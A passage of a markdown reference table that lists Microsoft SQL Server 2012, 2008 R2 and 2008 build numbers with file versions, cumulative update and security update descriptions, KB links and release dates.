| 11.0.2419 | 2011.110.2419.0 | RTM | CU | [2867319 Cumulative update package 9 (CU9) for SQL Server 2012](http://support.microsoft.com/kb/2867319) | 2013-08-21 |
| 11.0.2410 | 2011.110.2410.0 | RTM | CU | [2844205 Cumulative update package 8 (CU8) for SQL Server 2012](http://support.microsoft.com/kb/2844205) | 2013-06-18 |
| 11.0.2405 | 2011.110.2405.0 | RTM | CU | [2823247 Cumulative update package 7 (CU7) for SQL Server 2012](http://support.microsoft.com/kb/2823247) | 2013-04-15 |
| 11.0.2401 | 2011.110.2401.0 | RTM | CU | [2728897 Cumulative update package 6 (CU6) for SQL Server 2012](http://support.microsoft.com/kb/2728897) | 2013-02-18 |
| 11.0.2395 | 2011.110.2395.0 | RTM | CU | [2777772 Cumulative update package 5 (CU5) for SQL Server 2012](http://support.microsoft.com/kb/2777772) | 2012-12-18 |
| 11.0.9000 | 2011.110.9000.5 | RTM | CTP | Microsoft SQL Server 2012 With Power View For Multidimensional Models Customer Technology Preview (CTP3) | 2012-11-27 |
| 11.0.2383 | 2011.110.2383.0 | RTM | CU | [2758687 Cumulative update package 4 (CU4) for SQL Server 2012](http://support.microsoft.com/kb/2758687) | 2012-10-18 |
| 11.0.2376 | 2011.110.2376.0 | RTM | COD | [Microsoft Security Bulletin MS12-070](http://technet.microsoft.com/en-us/security/bulletin/ms12-070) | 2012-10-09 |
| 11.0.2332 | 2011.110.2332.0 | RTM | CU | [2723749 Cumulative update package 3 (CU3) for SQL Server 2012](http://support.microsoft.com/kb/2723749) | 2012-08-29 |
| 11.0.2325 | 2011.110.2325.0 | RTM | CU | [2703275 Cumulative update package 2 (CU2) for SQL Server 2012](http://support.microsoft.com/kb/2703275) | 2012-06-18 |
| 11.0.2316 | 2011.110.2316.0 | RTM | CU | [2679368 Cumulative update package 1 (CU1) for SQL Server 2012](http://support.microsoft.com/kb/2679368) | 2012-04-12 |
| 11.0.2218 | 2011.110.2218.0 | RTM | COD | [Microsoft Security Bulletin MS12-070](http://technet.microsoft.com/en-us/security/bulletin/ms12-070) | 2012-10-09 |
| 11.0.2214 | 2011.110.2214.0 | RTM | COD | 2685308 FIX: SSAS uses only 20 cores in SQL Server 2012 Business Intelligence | 2012-04-06 |
| 11.0.2100 | 2011.110.2100.60 | RTM | RTM | SQL Server 2012 RTM | 2012-03-06 |
| 11.0.1913 | 2011.110.1913.37 | RC | RC | Microsoft SQL Server 2012 Release Candidate 1 (RC1) | 2011-12-16 |
| 11.0.1750 | 2011.110.1750.32 | RC | RC | Microsoft SQL Server 2012 Release Candidate 0 (RC0) | 2011-11-17 |
| 11.0.1440 | 2010.110.1440.19 | CTP | CTP | Microsoft SQL Server 2012 (codename Denali) Community Technology Preview 3 (CTP3) | 2011-07-11 |
| 11.0.1103 | 2010.110.1103.9 | CTP | CTP | Microsoft SQL Server 2012 (codename Denali) Community Technology Preview 1 (CTP1) | 2010-11-08 |
Microsoft SQL Server 2008 R2 Builds
-----------------------------------
| Build | File version | KB / Description | Release Date |
| --- | --- | --- | --- |
| 10.50.6542 | 2009.100.6542.0 | [3146034 Intermittent service terminations occur after you install any SQL Server 2008 or SQL Server 2008 R2 versions from KB3135244](http://support.microsoft.com/en-us/kb/3146034) | 2016-03-03 |
| 10.50.6537 | 2009.100.6537.0 | [3135244 TLS 1.2 support for SQL Server 2008 R2 SP3](http://support.microsoft.com/en-us/kb/3135244) | 2016-01-27 |
| 10.50.6529 | 2009.100.6529.0 | [3045314 MS15-058: Description of the security update for SQL Server 2008 R2 Service Pack 3 QFE: July 14, 2015](http://support.microsoft.com/kb/3045314) | 2015-07-14 |
| 10.50.6525 | 2009.100.6525.0 | [3033860 An on-demand hotfix update package is available for SQL Server 2008 R2 Service Pack 3 (SP3)](http://support.microsoft.com/kb/3033860) | 2015-02-09 |
| 10.50.6220 | 2009.100.6220.0 | [3045316 MS15-058: Description of the security update for SQL Server 2008 R2 Service Pack 3 GDR: July 14, 2015](http://support.microsoft.com/kb/3045316) | 2015-07-14 |
| 10.50.6000.34 | 2009.100.6000.34 | [SQL Server 2008 R2 Service Pack 3 (SP3)](http://www.microsoft.com/en-us/download/details.aspx?id=44271) | 2014-09-26 |
| 10.50.4343 | 2009.100.4343.0 | [3135244 TLS 1.2 support for SQL Server 2008 R2 SP2 (IA-64 only)](http://support.microsoft.com/en-us/kb/3135244) | 2016-01-27 |
| 10.50.4339 | 2009.100.4339.0 | [3045312 MS15-058: Description of the security update for SQL Server 2008 R2 Service Pack 2 QFE: July 14, 2015](http://support.microsoft.com/kb/3045312) | 2015-07-14 |
| 10.50.4331 | 2009.100.4331.0 | [2987585 Restore Log with Standby Mode on an Advanced Format disk may cause a 9004 error in SQL Server 2008 R2 or SQL Server 2012](http://support.microsoft.com/kb/2987585) | 2014-08-27 |
| 10.50.4321 | 2009.100.4321.0 | [2977319 MS14-044: Description of the security update for SQL Server 2008 R2 Service Pack 2 (QFE)](http://support.microsoft.com/kb/2977319) | 2014-08-12 |
| 10.50.4319 | 2009.100.4319.0 | [2967540 Cumulative update package 13 (CU13) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2967540) | 2014-06-30 |
| 10.50.4305 | 2009.100.4305.0 | [2938478 Cumulative update package 12 (CU12) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2938478) | 2014-04-21 |
| 10.50.4302 | 2009.100.4302.0 | [2926028 Cumulative update package 11 (CU11) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2926028) | 2014-02-18 |
| 10.50.4297 | 2009.100.4297.0 | [2908087 Cumulative update package 10 (CU10) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2908087) | 2013-12-16 |
| 10.50.4295 | 2009.100.4295.0 | [2887606 Cumulative update package 9 (CU9) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2887606) | 2013-10-29 |
| 10.50.4290 | 2009.100.4290.0 | [2871401 Cumulative update package 8 (CU8) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2871401) | 2013-08-30 |
| 10.50.4286 | 2009.100.4286.0 | [2844090 Cumulative update package 7 (CU7) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2844090) | 2013-06-17 |
| 10.50.4285 | 2009.100.4285.0 | [2830140 Cumulative update package 6 (CU6) for SQL Server 2008 R2 Service Pack 2 (updated)](http://support.microsoft.com/kb/2830140) | 2013-06-13 |
| 10.50.4279 | 2009.100.4279.0 | 2830140 Cumulative update package 6 (CU6) for SQL Server 2008 R2 Service Pack 2 (replaced) | 2013-04-15 |
| 10.50.4276 | 2009.100.4276.0 | [2797460 Cumulative update package 5 (CU5) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2797460) | 2013-02-18 |
| 10.50.4270 | 2009.100.4270.0 | [2777358 Cumulative update package 4 (CU4) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2777358) | 2012-12-17 |
| 10.50.4266 | 2009.100.4266.0 | [2754552 Cumulative update package 3 (CU3) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2754552) | 2012-10-15 |
| 10.50.4263 | 2009.100.4263.0 | [2740411 Cumulative update package 2 (CU2) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2740411) | 2012-08-29 |
| 10.50.4260 | 2009.100.4260.0 | [2720425 Cumulative update package 1 (CU1) for SQL Server 2008 R2 Service Pack 2](http://support.microsoft.com/kb/2720425) | 2012-08-01 |
| 10.50.4042 | 2009.100.4042.0 | [3045313 MS15-058: MS15-058: Description of the security update for SQL Server 2008 R2 Service Pack 2 GDR: July 14, 2015](http://support.microsoft.com/kb/3045313) | 2015-07-14 |
| 10.50.4033 | 2009.100.4033.0 | [2977320 MS14-044: Description of the security update for SQL Server 2008 R2 Service Pack 2 (GDR)](http://support.microsoft.com/kb/2977320) | 2014-08-12 |
| 10.50.4000 | 2009.100.4000.0 | [SQL Server 2008 R2 Service Pack 2 (SP2)](http://www.microsoft.com/en-us/download/details.aspx?id=30437) | 2012-06-26 |
| 10.50.3720 | 2009.100.3720.0 | SQL Server 2008 R2 Service Pack 2 Community Technology Preview (CTP) | 2012-05-13 |
| 10.50.2881 | 2009.100.2881.0 | [2868244 An on-demand hotfix update package for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2868244) | 2013-08-12 |
| 10.50.2876 | 2009.100.2876.0 | [2855792 Cumulative update package 13 (CU13) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2855792) | 2013-06-17 |
| 10.50.2875 | 2009.100.2875.0 | [2828727 Cumulative update package 12 (CU12) for SQL Server 2008 R2 Service Pack 1 (updated)](http://support.microsoft.com/kb/2828727) | 2013-06-13 |
| 10.50.2874 | 2009.100.2874.0 | 2828727 Cumulative update package 12 (CU12) for SQL Server 2008 R2 Service Pack 1 (replaced) | 2013-04-15 |
| 10.50.2861 | 2009.100.2861.0 | [Microsoft Security Bulletin MS12-070](http://technet.microsoft.com/en-us/security/bulletin/ms12-070) | 2012-10-09 |
| 10.50.2869 | 2009.100.2869.0 | [2812683 Cumulative update package 11 (CU11) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2812683) | 2013-02-18 |
| 10.50.2868 | 2009.100.2868.0 | [2783135 Cumulative update package 10 (CU10) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2783135) | 2012-12-17 |
| 10.50.2866 | 2009.100.2866.0 | [2756574 Cumulative update package 9 (CU9) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2756574) | 2012-11-06 |
| 10.50.2861 | 2009.100.2861.0 | [2716439 MS12-070: Description of the security update for SQL Server 2008 R2 Service Pack 1 QFE: October 9, 2012](http://support.microsoft.com/kb/2716439) | 2012-10-09 |
| 10.50.2822 | 2009.100.2822.0 | [2723743 Cumulative update package 8 (CU8) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2723743) | 2012-08-29 |
| 10.50.2817 | 2009.100.2817.0 | [2703282 Cumulative update package 7 (CU7) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2703282) | 2012-06-18 |
| 10.50.2811 | 2009.100.2811.0 | [2679367 Cumulative update package 6 (CU6) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2679367) | 2012-04-16 |
| 10.50.2807 | 2009.100.2807.0 | [2675522 FIX: Access violation when you run DML statements against a table that has partitioned indexes in SQL Server 2008 R2](http://support.microsoft.com/kb/2675522) | 2012-03-12 |
| 10.50.2806 | 2009.100.2806.0 | [2659694 Cumulative update package 5 (CU5) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2659694) | 2012-02-22 |
| 10.50.2799 | 2009.100.2799.0 | [2633357 FIX: "Non-yielding Scheduler" error might occur when you run a query that uses the CHARINDEX function in SQL Server 2008 R2](http://support.microsoft.com/kb/2633357) | 2012-02-22 |
| 10.50.2796 | 2009.100.2796.0 | [2633146 Cumulative update package 4 (CU4) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2633146) | 2011-12-20 |
| 10.50.2789 | 2009.100.2789.0 | [2591748 Cumulative update package 3 (CU3) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2591748) | 2011-10-17 |
| 10.50.2776 | 2009.100.2776.0 | [2606883 FIX: Slow performance when an AFTER trigger runs on a partitioned table in SQL Server 2008 R2](http://support.microsoft.com/kb/2606883) | 2011-10-18 |
| 10.50.2772 | 2009.100.2772.0 | [2567714 Cumulative update package 2 (CU2) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2567714) | 2011-08-15 |
| 10.50.2769 | 2009.100.2769.0 | [2544793 Cumulative update package 1 (CU1) for SQL Server 2008 R2 Service Pack 1](http://support.microsoft.com/kb/2544793) | 2011-07-18 |
| 10.50.2550 | 2009.100.2550.0 | [Microsoft Security Bulletin MS12-070](http://technet.microsoft.com/en-us/security/bulletin/ms12-070) | 2012-10-09 |
| 10.50.2500 | 2009.100.2500.0 | [SQL Server 2008 R2 Service Pack 1 (SP1)](http://www.microsoft.com/download/en/details.aspx?id=26727) | 2011-07-11 |
| 10.50.1817 | 2009.100.1817.0 | [2703280 Cumulative update package 14 (CU14) for SQL Server 2008 R2](http://support.microsoft.com/kb/2703280) | 2012-06-18 |
| 10.50.1815 | 2009.100.1815.0 | [2679366 Cumulative update package 13 (CU13) for SQL Server 2008 R2](http://support.microsoft.com/kb/2679366) | 2012-04-17 |
| 10.50.1810 | 2009.100.1810.0 | [2659692 Cumulative update package 12 (CU12) for SQL Server 2008 R2](http://support.microsoft.com/kb/2659692) | 2012-02-21 |
| 10.50.1809 | 2009.100.1809.0 | [2633145 Cumulative update package 11 (CU11) for SQL Server 2008 R2](http://support.microsoft.com/kb/2633145) | 2012-01-09 |
| 10.50.1807 | 2009.100.1807.0 | [2591746 Cumulative update package 10 (CU10) for SQL Server 2008 R2](http://support.microsoft.com/kb/2591746) | 2011-10-19 |
| 10.50.1804 | 2009.100.1804.0 | [2567713 Cumulative update package 9 (CU9) for SQL Server 2008 R2](http://support.microsoft.com/kb/2567713) | 2011-08-16 |
| 10.50.1800 | 2009.100.1800.0 | [2574699 FIX: Database data files might be incorrectly marked as sparse in SQL Server 2008 R2 or in SQL Server 2008 even when the physical files are marked as not sparse in the file system](http://support.microsoft.com/kb/2574699) | 2011-10-18 |
| 10.50.1797 | 2009.100.1797.0 | [2534352 Cumulative update package 8 (CU8) for SQL Server 2008 R2](http://support.microsoft.com/kb/2534352) | 2011-06-20 |
| 10.50.1790 | 2009.100.1790.0 | [2494086 MS11-049: Description of the security update for SQL Server 2008 R2 QFE: June 14, 2011](http://support.microsoft.com/kb/2494086) | 2011-06-17 |
| 10.50.1777 | 2009.100.1777.0 | [2507770 Cumulative update package 7 (CU7) for SQL Server 2008 R2](http://support.microsoft.com/kb/2507770) | 2011-06-16 |
| 10.50.1769 | 2009.100.1769.0 | [2520808 FIX: Non-yielding scheduler error when you run a query that uses a TVP in SQL Server 2008 or in SQL Server 2008 R2 if SQL Profiler or SQL Server Extended Events is used](http://support.microsoft.com/kb/2520808) | 2011-04-18 |
| 10.50.1765 | 2009.100.1765.0 | [2489376 Cumulative update package 6 (CU6) for SQL Server 2008 R2](http://support.microsoft.com/kb/2489376) | 2011-02-21 |
| 10.50.1753 | 2009.100.1753.0 | [2438347 Cumulative update package 5 (CU5) for SQL Server 2008 R2](http://support.microsoft.com/kb/2438347) | 2010-12-23 |
| 10.50.1746 | 2009.100.1746.0 | [2345451 Cumulative update package 4 (CU4) for SQL Server 2008 R2](http://support.microsoft.com/kb/2345451) | 2010-10-18 |
| 10.50.1734 | 2009.100.1734.0 | [2261464 Cumulative update package 3 (CU3) for SQL Server 2008 R2](http://support.microsoft.com/kb/2261464) | 2010-08-20 |
| 10.50.1720 | 2009.100.1720.0 | [2072493 Cumulative update package 2 (CU2) for SQL Server 2008 R2](http://support.microsoft.com/kb/2072493) | 2010-06-25 |
| 10.50.1702 | 2009.100.1702.0 | [981355 Cumulative update package 1 (CU1) for SQL Server 2008 R2](http://support.microsoft.com/kb/981355) | 2010-05-18 |
| 10.50.1617 | 2009.100.1617.0 | [2494088 MS11-049: Description of the security update for SQL Server 2008 R2 GDR: June 14, 2011](http://support.microsoft.com/kb/2494088) | 2011-06-14 |
| 10.50.1600 | 2009.100.1600.1 | SQL Server 2008 R2 RTM | 2010-04-21 |
| 10.50.1352 | 2009.100.1352.12 | Microsoft SQL Server 2008 R2 November Community Technology Preview (CTP) | 2009-11-12 |
| 10.50.1092 | 2009.100.1092.20 | Microsoft SQL Server 2008 R2 August Community Technology Preview (CTP) | 2009-06-30 |
Microsoft SQL Server 2008 Builds
--------------------------------
| Build | File version | KB / Description | Release Date |
| --- | --- | --- | --- |
| 10.0.6547 | 2007.100.6547.0 | [3146034 Intermittent service terminations occur after you install any SQL Server 2008 or SQL Server 2008 R2 versions from KB3135244](http://support.microsoft.com/en-us/kb/3146034) | 2016-03-03 |
| 10.0.6543 | 2007.100.6543.0 | [3135244 TLS 1.2 support for SQL Server 2008 SP4](http://support.microsoft.com/en-us/kb/3135244) | 2016-01-27 |
| 10.0.6535 | 2007.100.6535.0 | [3045308 MS15-058: Description of the security update for SQL Server 2008 Service Pack 4 QFE: July 14, 2015](http://support.microsoft.com/kb/3045308) | 2015-07-14 |
| 10.0.6526 | 2007.100.6526.0 | [3034373 An on-demand hotfix update package is available for SQL Server 2008 Service Pack 4 (SP4)](http://support.microsoft.com/kb/3034373) | 2015-02-09 |
| 10.0.6241 | 2007.100.6241.0 | [3045311 MS15-058: Description of the security update for SQL Server 2008 Service Pack 4 GDR: July 14, 2015](https://support.microsoft.com/en-us/kb/3045311) | 2015-07-14 |
| 10.0.6000.29 | 2007.100.6000.29 | [2979596 SQL Server 2008 Service Pack 4 release information](https://support.microsoft.com/en-us/kb/2979596) | 2014-09-30 |
| 10.0.5894 | 2007.100.5894.0 | [3135244 TLS 1.2 support for SQL Server 2008 SP3 (IA-64 only)](http://support.microsoft.com/en-us/kb/3135244) | 2016-01-27 |
| 10.0.5890 | 2007.100.5890.0 | [3045303 MS15-058: Description of the security update for SQL Server 2008 Service Pack 3 QFE: July 14, 2015](https://support.microsoft.com/en-us/kb/3045303) | 2015-07-14 |
| 10.0.5869 | 2007.100.5869.0 | [2977322 MS14-044: Description of the security update for SQL Server 2008 SP3 (QFE)](http://support.microsoft.com/kb/2977322) | 2014-08-12 |
| 10.0.5867 | 2007.100.5867.0 | [2877204 FIX: Error 8985 when you run the "dbcc shrinkfile" statement by using the logical name of a file in SQL Server 2008 R2 or SQL Server 2008](http://support.microsoft.com/kb/2877204) | 2014-07-02 |
| 10.0.5861 | 2007.100.5861.0 | [2958696 Cumulative update package 17 (CU17) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2958696) | 2014-05-19 |
| 10.0.5852 | 2007.100.5852.0 | [2936421 Cumulative update package 16 (CU16) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2936421) | 2014-03-17 |
| 10.0.5850 | 2007.100.5850.0 | [2923520 Cumulative update package 15 (CU15) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2923520) | 2014-01-20 |
| 10.0.5848 | 2007.100.5848.0 | [2893410 Cumulative update package 14 (CU14) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2893410) | 2013-11-18 |
| 10.0.5846 | 2007.100.5846.0 | [2880350 Cumulative update package 13 (CU13) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2880350) | 2013-09-16 |
| 10.0.5844 | 2007.100.5844.0 | [2863205 Cumulative update package 12 (CU12) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2863205) | 2013-07-16 |
| 10.0.5841 | 2007.100.5841.0 | [2834048 Cumulative update package 11 (CU11) for SQL Server 2008 Service Pack 3 (updated)](http://support.microsoft.com/kb/2834048) | 2013-06-13 |
| 10.0.5840 | 2007.100.5840.0 | 2834048 Cumulative update package 11 (CU11) for SQL Server 2008 Service Pack 3 (replaced) | 2013-05-20 |
| 10.0.5835 | 2007.100.5835.0 | [2814783 Cumulative update package 10 (CU10) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2814783) | 2013-03-18 |
| 10.0.5829 | 2007.100.5829.0 | [2799883 Cumulative update package 9 (CU9) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2799883) | 2013-01-23 |
| 10.0.5828 | 2007.100.5828.0 | [2771833 Cumulative update package 8 (CU8) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2771833) | 2012-11-19 |
| 10.0.5826 | 2007.100.5826.0 | [2716435 Microsoft Security Bulletin MS12-070](http://support.microsoft.com/kb/2716435) | 2012-10-09 |
| 10.0.5794 | 2007.100.5794.0 | [2738350 Cumulative update package 7 (CU7) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2738350) | 2012-09-21 |
| 10.0.5788 | 2007.100.5788.0 | [2715953 Cumulative update package 6 (CU6) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2715953) | 2012-07-16 |
| 10.0.5785 | 2007.100.5785.0 | [2696626 Cumulative update package 5 (CU5) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2696626) | 2012-05-19 |
| 10.0.5775 | 2007.100.5775.0 | [2673383 Cumulative update package 4 (CU4) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2673383) | 2012-03-20 |
| 10.0.5770 | 2007.100.5770.0 | [2648098 Cumulative update package 3 (CU3) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2648098) | 2012-01-16 |
| 10.0.5768 | 2007.100.5768.0 | [2633143 Cumulative update package 2 (CU2) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2633143) | 2011-11-22 |
| 10.0.5766 | 2007.100.5766.0 | [2617146 Cumulative update package 1 (CU1) for SQL Server 2008 Service Pack 3](http://support.microsoft.com/kb/2617146) | 2011-10-18 |
| 10.0.5538 | 2007.100.5538.0 | [3045305 MS15-058: Description of the security update for SQL Server 2008 Service Pack 3 GDR: July 14, 2015](https://support.microsoft.com/en-us/kb/3045305) | 2015-07-14 |
| 10.0.5520 | 2007.100.5520.0 | [2977321 MS14-044: Description of the security update for SQL Server 2008 SP3 (GDR)](http://support.microsoft.com/kb/2977321) | 2014-08-12 |
| 10.0.5512 | 2007.100.5512.0 | [Microsoft Security Bulletin MS12-070](http://technet.microsoft.com/en-us/security/bulletin/ms12-070) | 2012-10-09 |
| 10.0.5500 | 2007.100.5500.0 | [SQL Server 2008 Service Pack 3 (SP3)](http://www.microsoft.com/download/en/details.aspx?id=27594) | 2011-10-06 |
| 10.0.5416 | 2007.100.5416.0 | SQL Server 2008 Service Pack 3 CTP | 2011-08-22 |
| 10.0.4371 | 2007.100.4371.0 | [Microsoft Security Bulletin MS12-070](http://technet.microsoft.com/en-us/security/bulletin/ms12-070) | 2012-10-09 |
| 10.0.4333 | 2007.100.4333.0 | [2715951 Cumulative update package 11 (CU11) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2715951) | 2012-07-16 |
| 10.0.4332 | 2007.100.4332.0 | [2696625 Cumulative update package 10 (CU10) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2696625) | 2012-05-20 |
| 10.0.4330 | 2007.100.4330.0 | [2673382 Cumulative update package 9 (CU9) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2673382) | 2012-03-19 |
| 10.0.4326 | 2007.100.4326.0 | [2648096 Cumulative update package 8 (CU8) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2648096) | 2012-01-30 |
| 10.0.4323 | 2007.100.4323.0 | [2617148 Cumulative update package 7 (CU7) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2617148) | 2011-11-21 |
| 10.0.4321 | 2007.100.4321.0 | [2582285 Cumulative update package 6 (CU6) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2582285) | 2011-09-20 |
| 10.0.4316 | 2007.100.4316.0 | [2555408 Cumulative update package 5 (CU5) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2555408) | 2011-07-18 |
| 10.0.4285 | 2007.100.4285.0 | [2527180 Cumulative update package 4 (CU4) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2527180) | 2011-05-16 |
| 10.0.4279 | 2007.100.4279.0 | [2498535 Cumulative update package 3 (CU3) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2498535) | 2011-03-11 |
| 10.0.4272 | 2007.100.4272.0 | [2467239 Cumulative update package 2 (CU2) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2467239) | 2011-02-10 |
| 10.0.4266 | 2007.100.4266.0 | [2289254 Cumulative update package 1 (CU1) for SQL Server 2008 Service Pack 2](http://support.microsoft.com/kb/2289254) | 2010-11-15 |
| 10.0.4067 | 2007.100.4067.0 | [Microsoft Security Bulletin MS12-070](http://technet.microsoft.com/en-us/security/bulletin/ms12-070) | 2012-10-09 |
| 10.0.4064 | 2007.100.4064.0 | [2494089 MS11-049: Description of the security update for SQL Server 2008 Service Pack 2 GDR: June 14, 2011](http://support.microsoft.com/kb/2494089) | 2011-06-14 |
| 10.0.4000 | 2007.100.4000.0 | [SQL Server 2008 Service Pack 2 (SP2)](http://www.microsoft.com/downloads/en/details.aspx?FamilyID=8FBFC1DE-D25E-4790-88B5-7DDA1F1D4E17) | 2010-09-29 |
| 10.0.3798 | 2007.100.3798.0 | SQL Server 2008 Service Pack 2 CTP | 2010-07-07 |
| 10.0.2850 | 2007.100.2850.0 | [2582282 Cumulative update package 16 (CU16) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/2582282) | 2011-09-19 |
| 10.0.2847 | 2007.100.2847.0 | [2555406 Cumulative update package 15 (CU15) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/2555406) | 2011-07-18 |
| 10.0.2821 | 2007.100.2821.0 | [2527187 Cumulative update package 14 (CU14) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/2527187) | 2011-05-16 |
| 10.0.2816 | 2007.100.2816.0 | [2497673 Cumulative update package 13 (CU13) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/2497673) | 2011-03-22 |
| 10.0.2808 | 2007.100.2808.0 | [2467236 Cumulative update package 12 (CU12) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/2467236) | 2011-02-10 |
| 10.0.2804 | 2007.100.2804.0 | [2413738 Cumulative update package 11 (CU11) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/2413738) | 2010-11-15 |
| 10.0.2799 | 2007.100.2799.0 | [2279604 Cumulative update package 10 (CU10) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/2279604) | 2010-09-21 |
| 10.0.2789 | 2007.100.2789.0 | [2083921 Cumulative update package 9 (CU9) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/2083921) | 2010-07-21 |
| 10.0.2787 | 2007.100.2787.0 | [2231277 FIX: The Reporting Services service stops unexpectedly after you apply SQL Server 2008 SP1 CU 7 or CU8](http://support.microsoft.com/kb/2231277) | 2010-07-30 |
| 10.0.2775 | 2007.100.2775.0 | [981702 Cumulative update package 8 (CU8) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/981702) | 2010-05-17 |
| 10.0.2766 | 2007.100.2766.0 | [979065 Cumulative update package 7 (CU7) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/979065) | 2010-03-26 |
| 10.0.2757 | 2007.100.2757.0 | [977443 Cumulative update package 6 (CU6) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/977443) | 2010-01-18 |
| 10.0.2746 | 2007.100.2746.0 | [975977 Cumulative update package 5 (CU5) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/975977) | 2009-11-16 |
| 10.0.2740 | 2007.100.2740.0 | [976761 FIX: Error message when you perform a rolling upgrade in a SQL Server 2008 cluster: "18401, Login failed for user SQLTEST\AgentService. Reason: Server is in script upgrade mode. Only administrator can connect at this time.SQLState 42000"](http://support.microsoft.com/kb/976761) | 2009-11-24 |
| 10.0.2734 | 2007.100.2734.0 | [973602 Cumulative update package 4 (CU4) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/973602) | 2009-09-22 |
| 10.0.2723 | 2007.100.2723.0 | [971491 Cumulative update package 3 (CU3) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/971491) | 2009-07-21 |
| 10.0.2714 | 2007.100.2714.0 | [970315 Cumulative update package 2 (CU2) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/970315) | 2009-05-18 |
| 10.0.2712 | 2007.100.2712.0 | [970507 FIX: Error message in SQL Server 2008 when you run an INSERT SELECT statement on a table](http://support.microsoft.com/kb/970507) | 2009-07-21 |
| 10.0.2710 | 2007.100.2710.0 | [969099 Cumulative update package 1 (CU1) for SQL Server 2008 Service Pack 1](http://support.microsoft.com/kb/969099) | 2009-04-16 |
| 10.0.2573 | 2007.100.2573.0 | [2494096 MS11-049: Description of the security update for SQL Server 2008 Service Pack 1 GDR: June 14, 2011](http://support.microsoft.com/kb/2494096) | 2011-06-14 |
| 10.0.2531 | 2007.100.2531.0 | [SQL Server 2008 Service Pack 1 (SP1)](http://www.microsoft.com/en-us/download/details.aspx?id=20302) | 2009-04-07 |
| 10.0.2520 | 2007.100.2520.0 | SQL Server 2008 Service Pack 1 — CTP | 2009-02-23 |
| 10.0.1835 | 2007.100.1835.0 | [979064 Cumulative update package 10 (CU10) for SQL Server 2008](http://support.microsoft.com/kb/979064) | 2010-03-15 |
| 10.0.1828 | 2007.100.1828.0 | [977444 Cumulative update package 9 (CU9) for SQL Server 2008](http://support.microsoft.com/kb/977444) | 2010-01-18 |
| 10.0.1823 | 2007.100.1823.0 | [975976 Cumulative update package 8 (CU8) for SQL Server 2008](http://support.microsoft.com/kb/975976) | 2009-11-16 |
| 10.0.1818 | 2007.100.1818.0 | [973601 Cumulative update package 7 (CU7) for SQL Server 2008](http://support.microsoft.com/kb/973601) | 2009-09-21 |
| 10.0.1812 | 2007.100.1812.0 | [971490 Cumulative update package 6 (CU6) for SQL Server 2008](http://support.microsoft.com/kb/971490) | 2009-07-21 |
| 10.0.1806 | 2007.100.1806.0 | [969531 Cumulative update package 5 (CU5) for SQL Server 2008](http://support.microsoft.com/kb/969531) | 2009-05-18 |
| 10.0.1798 | 2007.100.1798.0 | [963036 Cumulative update package 4 (CU4) for SQL Server 2008](http://support.microsoft.com/kb/963036) | 2009-03-17 |
